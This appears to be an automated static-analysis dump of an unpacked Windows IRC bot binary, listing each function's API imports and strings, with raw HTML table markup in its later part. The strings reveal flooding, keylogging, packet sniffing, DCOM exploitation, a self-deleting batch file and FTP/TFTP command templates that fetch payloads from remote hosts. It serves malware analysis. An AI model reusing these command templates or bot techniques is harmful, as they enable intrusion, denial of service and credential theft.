sub_outside():
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.gethostbyname
WS2_32.shutdown
KERNEL32.GetTickCount
KERNEL32.GetComputerNameA
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
NTDLL.RtlGetLastWin32Error
KERNEL32.VirtualAlloc
KERNEL32.VirtualProtect
KERNEL32.GetCurrentProcessId
KERNEL32.OpenMutexA
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
USER32.FindWindowA
USER32.SendMessageA
KERNEL32.ReleaseMutex
KERNEL32.GetEnvironmentVariableA
KERNEL32.SetEnvironmentVariableA
KERNEL32.GetStartupInfoA
KERNEL32.GetModuleFileNameA
KERNEL32.GetCommandLineA
KERNEL32.CreateProcessA
USER32.WaitForInputIdle
KERNEL32.GetCurrentThread
KERNEL32.SetThreadPriority
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
USER32.MessageBoxA
KERNEL32.CreateFileA
KERNEL32.GetFileSize
KERNEL32.ReadFile
KERNEL32.CloseHandle
USER32.SetPropA
USER32.EnumThreadWindows
USER32.GetPropA
NTDLL.RtlEnterCriticalSection
KERNEL32.ReadProcessMemory
NTDLL.RtlLeaveCriticalSection
USER32.DefWindowProcA
KERNEL32.CreateFileMappingA
KERNEL32.GetCurrentProcess
KERNEL32.DuplicateHandle
KERNEL32.MapViewOfFile
KERNEL32.GetStartupInfoW
KERNEL32.GetModuleFileNameW
KERNEL32.GetCommandLineW
KERNEL32.CreateProcessW
KERNEL32.GetModuleHandleA
KERNEL32.ResumeThread
KERNEL32.DebugActiveProcess
KERNEL32.SuspendThread
KERNEL32.CreateThread
KERNEL32.FreeConsole
KERNEL32.InitializeCriticalSection
KERNEL32.GetThreadContext
KERNEL32.SetThreadContext
KERNEL32.ContinueDebugEvent
KERNEL32.UnmapViewOfFile
KERNEL32.VirtualProtectEx
KERNEL32.WriteProcessMemory
USER32.CreateWindowExA
USER32.DestroyWindow
KERNEL32.GetLocalTime
|
_WinMain16():
KERNEL32.GetModuleHandleA
USER32.MessageBoxA
|
sub_4BDFA4(0070):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"COMCTL32.DLL"
"PropertySheetA"
|
sub_41FE39(0126):
KERNEL32.SetUnhandledExceptionFilter
|
sub_4156FD(012a):
WS2_32.WSAStartup
KERNEL32.SetConsoleCtrlHandler
NTDLL.RtlGetLastWin32Error
WS2_32.WSACleanup
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.setsockopt
WS2_32.inet_ntoa
KERNEL32.Sleep
WS2_32.WSAGetLastError
WS2_32.closesocket
|
sub_416E05(0207):
"-[Thread List]-"
"%d. %s"
|
sub_40761F(028e):
"%d.%d.%d.%d"
|
sub_40AA30(03c8):
NTDLL.RtlGetLastWin32Error
"%s Error: %s <%d>."
|
sub_4B6060(03f2):
USER32.CreateDialogIndirectParamA
NTDLL.RtlGetLastWin32Error
USER32.ShowWindow
USER32.UpdateWindow
|
sub_40B71C(04c3):
KERNEL32.GetTickCount
"%dd %dh %dm"
|
sub_4018CA(06e5):
WS2_32.htons
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
KERNEL32.Sleep
WS2_32.closesocket
|
sub_40BB87(0727):
WININET.InternetGetConnectedStateEx
"Not connected"
"Dial-up"
"[NETINFO]: [Type]: %s (%s). [IP Address"...
|
sub_4CA24A(0891):
NTDLL.RtlAllocateHeap
|
sub_409032(08cf):
"SeDebugPrivilege"
"NTDLL.DLL"
"NtQuerySystemInformation"
"RtlCreateQueryDebugBuffer"
"RtlQueryProcessDebugInformation"
"RtlDestroyQueryDebugBuffer"
"RtlRunDecodeUnicodeString"
"SeDebugPrivilege"
|
sub_408C13(09fa):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
"%s\\%s"
"r"
"="
"="
|
sub_4CBEC9(0a41):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_405145(0b69):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"echo open %s %d > o&echo user 1 1 >> o "...
"%s\r\n"
|
sub_4022BD(0d63):
KERNEL32.GetLocalTime
KERNEL32.GetSystemDirectoryA
"\\"
"cvbei.dll"
"ab"
"[%d-%d-%d %d:%d:%d] %s\r\n"
|
sub_415E26(0d63):
WS2_32.inet_ntoa
KERNEL32.Sleep
WS2_32.htonl
|
sub_40AF81(0d8a):
IPHLPAPI.IcmpCreateFile
WS2_32.inet_addr
WS2_32.gethostbyname
IPHLPAPI.IcmpSendEcho
IPHLPAPI.IcmpCloseHandle
|
sub_40A94C(0f38):
MSVCRT._tolower
|
sub_40AC3D(10da):
KERNEL32.GetTempPathA
KERNEL32.GetModuleFileNameA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
KERNEL32.ExpandEnvironmentStringsA
KERNEL32.CreateProcessA
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
"%%comspec%% /c %s %s"
|
sub_401D79(10db):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.WSAGetLastError
WS2_32.setsockopt
WS2_32.inet_addr
WS2_32.htons
WS2_32.htonl
WS2_32.sendto
WS2_32.closesocket
"syn"
"ack"
"random"
|
sub_4C0B75(1105):
"unknown compression method"
"invalid window size"
"incorrect header check"
"need dictionary"
"incorrect data check"
|
sub_40D245(117a):
"failed"
|
sub_4B4965(135c):
KERNEL32.GetEnvironmentVariableA
"ARMSPLASHOFF"
|
sub_40267F(1391):
WS2_32.htons
WS2_32.inet_addr
WS2_32.socket
WS2_32.WSAGetLastError
WS2_32.bind
WS2_32.closesocket
WS2_32.WSAIoctl
WS2_32.recv
WS2_32.inet_ntoa
":.login"
"[PSNIFF]"
|
sub_40ADC5(1417):
WS2_32.inet_addr
WS2_32.gethostbyname
|
sub_40D317(1518):
KERNEL32.GetLogicalDriveStringsA
"A:\\"
|
sub_4CCEF1(1692):
KERNEL32.VirtualAlloc
|
sub_4085A0(1772):
GDI32.CreateDCA
GDI32.GetDeviceCaps
GDI32.CreateCompatibleDC
GDI32.CreateDIBSection
GDI32.SelectObject
GDI32.BitBlt
GDI32.GetDIBColorTable
GDI32.DeleteObject
GDI32.DeleteDC
"DISPLAY"
|
sub_40ADFD(17f3):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
|
sub_4BE07A(1971):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
USER32.GetDesktopWindow
"COMCTL32.DLL"
"_TrackMouseEvent"
|
sub_407F3A(1a84):
WS2_32.recv
WS2_32.send
WS2_32.closesocket
|
sub_40D4BC(1cb3):
WS2_32.inet_addr
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
|
sub_4075D7(1ccb):
WS2_32.htonl
|
sub_4C7E30(1d04):
"invalid distance code"
"invalid literal/length code"
|
sub_415408(1e2b):
KERNEL32.OpenProcess
|
sub_415D59(20bb):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.inet_ntoa
WS2_32.closesocket
|
sub_40AEDB(245f):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_4B3AA2(25ac):
KERNEL32.CreateThread
KERNEL32.CloseHandle
USER32.IsWindow
KERNEL32.Sleep
|
sub_404950(25d1):
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\browser"
|
sub_40C2CD(2937):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.connect
WS2_32.closesocket
|
sub_40966A(2950):
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
|
sub_40B412(2a69):
KERNEL32.PeekNamedPipe
KERNEL32.GetExitCodeProcess
KERNEL32.Sleep
|
sub_4030DF(2a8a):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"tftp -i %s get %s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
"%s\r\n"
|
sub_40CAF1(2e2f):
WININET.InternetOpenUrlA
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.CreateProcessA
WS2_32.WSACleanup
WININET.InternetCloseHandle
"open"
|
sub_404F9B(302c):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_404E55(302c):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_4B72D0(3124):
KERNEL32.GetModuleFileNameA
KERNEL32.FindFirstFileA
KERNEL32.FindClose
|
sub_40D39C(3181):
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.Sleep
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleFileNameA
KERNEL32.CreateProcessA
|
sub_40A4A7(3422):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Avicap32.dll failed. <%d>"
|
sub_409534(3459):
KERNEL32.OpenProcess
KERNEL32.GetSystemInfo
KERNEL32.VirtualQueryEx
NTDLL.RtlAllocateHeap
KERNEL32.ReadProcessMemory
NTDLL.RtlFreeHeap
|
sub_40DCE4(3477):
ADVAPI32.IsValidSecurityDescriptor
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_4B3329(373a):
KERNEL32.InitializeCriticalSection
KERNEL32.GetCurrentProcessId
KERNEL32.GetModuleFileNameW
KERNEL32.GetShortPathNameW
KERNEL32.GetModuleFileNameA
KERNEL32.GetShortPathNameA
|
sub_4B735F(37f6):
KERNEL32.GetModuleFileNameW
KERNEL32.FindFirstFileW
KERNEL32.FindClose
|
sub_4B6F14(3a72):
USER32.BeginPaint
GDI32.CreateCompatibleDC
GDI32.SelectObject
GDI32.SelectPalette
GDI32.RealizePalette
GDI32.BitBlt
GDI32.DeleteDC
USER32.EndPaint
GDI32.DeleteObject
USER32.GetAsyncKeyState
KERNEL32.GetTickCount
USER32.KillTimer
USER32.SendMessageA
USER32.DestroyWindow
USER32.DefWindowProcA
|
sub_408EE0(3b27):
KERNEL32.FindNextFileA
KERNEL32.FindClose
"%s\\*"
"%s\\%s"
" Found: %s\\%s"
|
sub_415985(3b5d):
KERNEL32.GetTickCount
"[bot]-"
"%s"
"%s%i"
|
sub_40938D(3b79):
KERNEL32.OpenProcess
KERNEL32.GetSystemInfo
NTDLL.RtlAllocateHeap
KERNEL32.ReadProcessMemory
KERNEL32.VirtualQueryEx
KERNEL32.FileTimeToLocalFileTime
KERNEL32.FileTimeToSystemTime
NTDLL.RtlFreeHeap
|
sub_4C63A5(3c37):
"invalid literal/length code"
"invalid distance code"
|
sub_407758(3e4f):
KERNEL32.GetTickCount
WS2_32.inet_ntoa
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
"dcom135"
|
sub_4B48AD(3f49):
"PDATA000"
|
sub_40AB77(3f4b):
KERNEL32.SearchPathA
KERNEL32.GetFileTime
KERNEL32.SetFileTime
"explorer.exe"
|
sub_40B8D3(4200):
KERNEL32.GetVersionExA
ADVAPI32.GetUserNameA
WS2_32.inet_addr
WS2_32.gethostbyaddr
KERNEL32.GetSystemDirectoryA
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
KERNEL32.GlobalMemoryStatus
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2003"
"???"
"%s (%s)"
"couldn't resolve host"
"dd:MMM:yyyy"
"HH:mm:ss"
"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
|
sub_40239E(43c8):
USER32.GetForegroundWindow
KERNEL32.Sleep
USER32.GetKeyState
USER32.GetAsyncKeyState
"%s (Changed Windows: %s)"
"b"
"%s (Buffer full) (%s)"
"%s (Return) (%s)"
|
sub_416703(4448):
KERNEL32.CreatePipe
NTDLL.RtlGetLastWin32Error
|
sub_4168D5(4559):
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_41629B(4588):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
KERNEL32.GetLogicalDrives
KERNEL32.GetDriveTypeA
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
|
sub_40B10D(479b):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.htons
WS2_32.sendto
KERNEL32.Sleep
|
sub_40ADEE(4aae):
DNSAPI.DnsFlushResolverCache
|
sub_40E319(4af9):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_415F77(4c7e):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
|
sub_416987(4e7e):
WS2_32.recv
KERNEL32.GenerateConsoleCtrlEvent
WS2_32.send
|
sub_40E5CD(51cf):
KERNEL32.GetComputerNameA
|
sub_4B39A7(5302):
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_40182E(54eb):
"[SUPERSYN]: Done with flood (%iKB/sec)"
|
sub_40B785(5572):
KERNEL32.GetVersionExA
|
sub_416E83(5581):
WS2_32.closesocket
|
sub_4167FC(558b):
KERNEL32.GetCurrentProcess
KERNEL32.CreateProcessA
NTDLL.RtlGetLastWin32Error
"cmd /q"
|
sub_4CBD54(5645):
KERNEL32.GetModuleHandleA
|
sub_4081DC(5682):
WS2_32.select
WS2_32.closesocket
WS2_32.recv
WS2_32.send
WS2_32.socket
WS2_32.WSAGetLastError
WS2_32.connect
|
sub_4069FF(5a4b):
WS2_32.send
WS2_32.WSAGetLastError
|
sub_40D0E2(5b85):
KERNEL32.GetDiskFreeSpaceExA
|
sub_4B370A(5bb1):
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_407243(5d39):
KERNEL32.GetModuleFileNameA
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_40D834(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_401A6D(6401):
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
KERNEL32.QueryPerformanceFrequency
KERNEL32.QueryPerformanceCounter
WS2_32.htonl
WS2_32.sendto
WS2_32.WSAGetLastError
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_40BC4D(679a):
WININET.InternetCrackUrlA
WININET.InternetConnectA
WININET.HttpOpenRequestA
WININET.HttpSendRequestA
WININET.InternetCloseHandle
|
sub_4060CD(6bb0):
KERNEL32.GetFileAttributesA
WS2_32.closesocket
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
"\\%s"
"%s"
"%s%s"
"\n"
"*"
|
sub_4CA2FB(6c37):
NTDLL.RtlFreeHeap
|
sub_4071CC(6c4c):
WS2_32.inet_ntoa
|
sub_40796C(6c57):
WS2_32.inet_addr
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.inet_ntoa
|
sub_403DED(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
|
sub_4CA3A2(7566):
NTDLL.RtlAllocateHeap
|
sub_415C4D(78ea):
KERNEL32.GetTickCount
USER32.FindWindowA
"mIRC"
"[M]"
"[%d]%s"
"[M]"
|
sub_40AAF5(7980):
USER32.FindWindowA
USER32.SendMessageA
"mIRC"
|
sub_4B36BD(7982):
KERNEL32.GetVersionExA
|
sub_4165B2(7989):
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForMultipleObjects
WS2_32.closesocket
|
sub_40ECD9(7b99):
WS2_32.send
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv
"PASS %s\r\n"
|
sub_4084A0(7e67):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
WS2_32.send
|
sub_4159E3(7e76):
KERNEL32.GetTickCount
|
sub_416FD6(7f61):
"%s: %s stopped. (%d thread(s) stopped.)"...
"%s: No %s thread found."
|
sub_4053D6(7fdf):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"220 NzmxFtpd 0wns j0\n"
"%s %s"
"USER"
"331 Password required\n"
"PASS"
"230 User logged in.\n"
"SYST"
"215 NzmxFtpd\n"
"REST"
"350 Restarting.\n"
"257 \"/\" is current directory.\n"
"TYPE"
"A"
"200 Type set to A.\n"
"TYPE"
"I"
"200 Type set to I.\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200 PORT command successful.\n"
"RETR"
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye happy r00ting.\n"
|
sub_4BE034(84b1):
USER32.GetSystemMetrics
USER32.MoveWindow
|
sub_405F4B(852a):
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
WS2_32.send
WS2_32.closesocket
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
|
sub_4CC125(87ad):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_403F8B(88be):
WS2_32.send
|
sub_40C514(88c4):
WS2_32.socket
WS2_32.htons
WS2_32.bind
WS2_32.getsockname
WS2_32.listen
WS2_32.inet_addr
WS2_32.htonl
WS2_32.select
WS2_32.accept
WS2_32.closesocket
WS2_32.send
WS2_32.recv
WS2_32.inet_ntoa
|
sub_4B45CC(8929):
USER32.MessageBoxA
"Insufficient memory!"
|
sub_40DBAE(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_40AABA(8e50):
USER32.OpenClipboard
USER32.GetClipboardData
USER32.CloseClipboard
|
sub_40637D(9000):
WS2_32.send
KERNEL32.FindNextFileA
KERNEL32.FileTimeToLocalFileTime
KERNEL32.FileTimeToSystemTime
KERNEL32.Sleep
KERNEL32.FindClose
"\n"
"PRIVMSG %s :Searching for: %s\r\n"
"\r\n\r\nIndex of %s</TIT"...
"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
".."
"."
"PM"
"AM"
"%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
"<%s>"
"PRIVMSG %s :%-31s %-21s\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s/"
"\"><CODE>%.29s>/</CODE></A>"
"\"><CODE>%s/</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"<%s>"
"%-31s %-21s\r\n"
"PRIVMSG %s :%-31s %-21s (%s bytes)\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s"
"\"><CODE>%.30s></CODE></A>"
"\"><CODE>%s</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"%-31s %-21s (%i bytes)\r\n"
"PRIVMSG %s :Found %s Files and %s Direc"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_403A87"><td><pre><a name="sub_403A87"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_403A87"><font size=+2>sub_403A87</a>(9106)</font>:<font color=brown>
"CCCC"
</font></pre></td></tr><tr id="sub_4195E9"><td><pre><a name="sub_4195E9"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4195E9"><font size=+2>sub_4195E9</a>(91cb)</font>:<font color=darkgreen>
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_401000"><td><pre><a name="sub_401000"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_401000"><font size=+2>sub_401000</a>(930a)</font>:<font color=darkgreen>
KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_402B7B"><td><pre><a name="sub_402B7B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_402B7B"><font size=+2>sub_402B7B</a>(9333)</font>:<font color=brown>
"FXNBFXFXNBFXFXFXFX"
</font></pre></td></tr><tr id="sub_405AF0"><td><pre><a name="sub_405AF0"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_405AF0"><font size=+2>sub_405AF0</a>(9341)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.ioctlsocket
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.recv
WS2_32.closesocket
WS2_32.WSAGetLastError</font>
<font color=brown>
"GET "
" "
"\r\n"
</font></pre></td></tr><tr id="sub_4059D9"><td><pre><a name="sub_4059D9"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4059D9"><font size=+2>sub_4059D9</a>(9713)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B5E8E"><td><pre><a name="sub_4B5E8E"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B5E8E"><font size=+2>sub_4B5E8E</a>(9729)</font>:<font color=darkgreen>
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
KERNEL32.GetCurrentProcessId
KERNEL32.CreateMutexA</font>
<font color=brown>
"Kernel32"
"IsDebuggerPresent"
"%X:DAF"
</font></pre></td></tr><tr id="sub_407BCB"><td><pre><a name="sub_407BCB"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_407BCB"><font size=+2>sub_407BCB</a>(97ac)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.WSAAsyncSelect
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_403E6C"><td><pre><a name="sub_403E6C"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_403E6C"><font size=+2>sub_403E6C</a>(981b)</font>:<font color=darkgreen>
WS2_32.htonl
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_40E499"><td><pre><a name="sub_40E499"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40E499"><font size=+2>sub_40E499</a>(9bb4)</font>:<font color=brown>
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
</font></pre></td></tr><tr id="sub_4B37DC"><td><pre><a name="sub_4B37DC"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B37DC"><font size=+2>sub_4B37DC</a>(9bde)</font>:<font color=darkgreen>
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B45FB"><td><pre><a name="sub_4B45FB"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B45FB"><font size=+2>sub_4B45FB</a>(9c83)</font>:<font color=darkgreen>
KERNEL32.FreeConsole
USER32.DestroyWindow
KERNEL32.GetModuleHandleA</font>
<font color=brown>
"s"
"p"
"SetFunctionAddresses"
</font></pre></td></tr><tr id="sub_4B6C08"><td><pre><a name="sub_4B6C08"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B6C08"><font size=+2>sub_4B6C08</a>(9d49)</font>:<font color=darkgreen>
KERNEL32.GetTickCount
KERNEL32.CreateThread
KERNEL32.CloseHandle
KERNEL32.Sleep
KERNEL32.GetCurrentThreadId
USER32.LoadCursorA
USER32.RegisterClassA
USER32.GetAsyncKeyState
USER32.GetSystemMetrics
USER32.CreateWindowExA
USER32.ShowWindow
USER32.UpdateWindow
USER32.SetTimer
KERNEL32.SetEnvironmentVariableA</font>
<font color=brown>
"ArBase Test Bitmap Window"
"%08X"
</font></pre></td></tr><tr id="sub_40AC1B"><td><pre><a name="sub_40AC1B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40AC1B"><font size=+2>sub_40AC1B</a>(9dbe)</font>:<font color=darkgreen>
USER32.ExitWindowsEx</font>
<font color=brown>
"SeShutdownPrivilege"
</font></pre></td></tr><tr id="sub_41FE62"><td><pre><a name="sub_41FE62"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_41FE62"><font size=+2>sub_41FE62</a>(9ed0)</font>:<font color=darkgreen>
KERNEL32.IsBadWritePtr</font>
<font color=brown></font></pre></td></tr><tr id="sub_41FE46"><td><pre><a name="sub_41FE46"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_41FE46"><font size=+2>sub_41FE46</a>(9ed0)</font>:<font color=darkgreen>
KERNEL32.IsBadReadPtr</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B3E30"><td><pre><a name="sub_4B3E30"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B3E30"><font size=+2>sub_4B3E30</a>(9fad)</font>:<font color=darkgreen>
KERNEL32.IsBadReadPtr
KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_406AEA"><td><pre><a name="sub_406AEA"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_406AEA"><font size=+2>sub_406AEA</a>(a059)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_402AC3"><td><pre><a name="sub_402AC3"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_402AC3"><font size=+2>sub_402AC3</a>(a15d)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar
KERNEL32.Sleep</font>
<font color=brown>
"\\\\"
</font></pre></td></tr><tr id="sub_40D12A"><td><pre><a name="sub_40D12A"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D12A"><font size=+2>sub_40D12A</a>(a193)</font>:<font color=brown>
"%sKB"
"failed"
</font></pre></td></tr><tr id="sub_403240"><td><pre><a name="sub_403240"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_403240"><font size=+2>sub_403240</a>(a34c)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.send
WS2_32.recv
KERNEL32.Sleep</font>
<font color=brown>
"\\\\%s\\ipc$"
"ë"
"ë"
</font></pre></td></tr><tr id="sub_406C0B"><td><pre><a name="sub_406C0B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_406C0B"><font size=+2>sub_406C0B</a>(a4db)</font>:<font color=darkgreen>
WS2_32.socket
KERNEL32.Sleep
WS2_32.WSAGetLastError
WS2_32.htons
WS2_32.bind
WS2_32.select
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.sendto
WS2_32.closesocket</font>
<font color=brown>
"octet"
